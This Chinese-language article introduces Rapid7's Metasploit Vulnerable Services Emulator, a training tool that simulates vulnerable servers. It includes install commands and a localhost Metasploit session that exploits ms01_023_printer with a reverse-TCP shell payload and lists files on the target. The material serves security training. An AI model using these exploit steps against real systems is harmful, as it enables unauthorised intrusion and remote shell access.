Rapid7发布Metasploit攻防模拟实训工具

项目地址

https://github.com/rapid7/metasploit-vulnerability-emulator

简介

许人想要学习安全方面的技能,因为现在这是一个非常热门的领域。网上有很多免费工具可供使用学习,其中最有名的是Metasploit。然而,没有包含特定漏洞的服务器用来测试,很难学会使用Metasploit。

Metasploit Vulnerable Services Emulator可以模拟包含漏洞的服务器,帮助安全从业人员测试Metasploit模块以及完成一些Metasploit的培训

Metasploit-Vulnerable-Services-Emulator

这个模拟器可以运行在Linux(Ubutu),Windows平台,目前已经支持对一百多种漏洞的模拟,以后还将继续增加更多的模块

运行

注意,在shell会话中执行的命令实际上是在目标上执行的,所以请在安全的环境中运行这个模拟器。

运行必须根据您的环境安装以下程序包:IO :: Socket :: SSL Try :: Tiny IO :: Compress :: Gzip Compress :: Zlib Storable。在我的Ubuntu上,他们可以安装为

sudo cpanm install IO::Socket::SSL Try::Tiny IO::Compress::Gzip Compress::Zlib Storable JSON

关于漏洞模拟器:

perl vulEmu.pl
>>activate exploits/windows/iis/ms01_023_printer

在Metasploit控制台:

msf > use exploit/windows/iis/ms01_023_printer
msf > set payload windows/shell_reverse_tcp
msf > setg RHOST 127.0.0.1
msf > setg LHOST 127.0.0.1
msf exploit(ms01_023_printer) > run

[*] Started reverse TCP handler on 127.0.0.1:4444 
[*] Command shell session 4 opened (127.0.0.1:4444 -> 127.0.0.1:51852) at 2017-01-20 10:47:12 -0600

>ls
README.md
secret.txt
server_cert.pem
server_key.pem
service.cfg
vulEmu.pl

 

开发人员概述

该软件有两个部分

  • JSON中的服务器/服务仿真描述文件(service.cfg)
  • Interpreter(目前在perl中实现,但也可以使用其他语言)

下面是服务模拟描述文件的一个快速示例,用于Metasploit中的exploit /multi/http/tomcat_mgr_deploy模块。

CODE

最重要的部分是“seq”数组。它总是有偶数个条目。当接收到消息时,将其与条目0,2,4 …比较…一旦找到匹配,它将立即执行该条目。例如,如果一个条目与条目2匹配,它将执行条目3中的语句。

例如

  • regex:做一个正则表达式匹配
  • starts:检查传入消息是否以条目中的字符串开头执行条目本身可以有多个条目。每个条目只能是字符串,数组或字典。字符串和数组用于构建响应消息(串联)。
  • repeat:重复字符串(第二个元素)由第三个元素指定的特定次数后返回一个字符串。
  • nsize:返回元素的大小
  • gzip:返回gzip压缩的内容它还可以将字符串压缩成二进制数据,例如[“N”,123],它将数字123压缩为大端字节4字节整数。

 

*转载请注明来自MottoIN

原创文章,作者:Jarry,如若转载,请注明出处:http://www.mottoin.com/tools/98197.html

发表评论

登录后才能评论

联系我们

021-62666911

在线咨询:点击这里给我发消息

邮件:root@mottoin.com

工作时间:周一至周五,9:30-18:30,节假日休息

QR code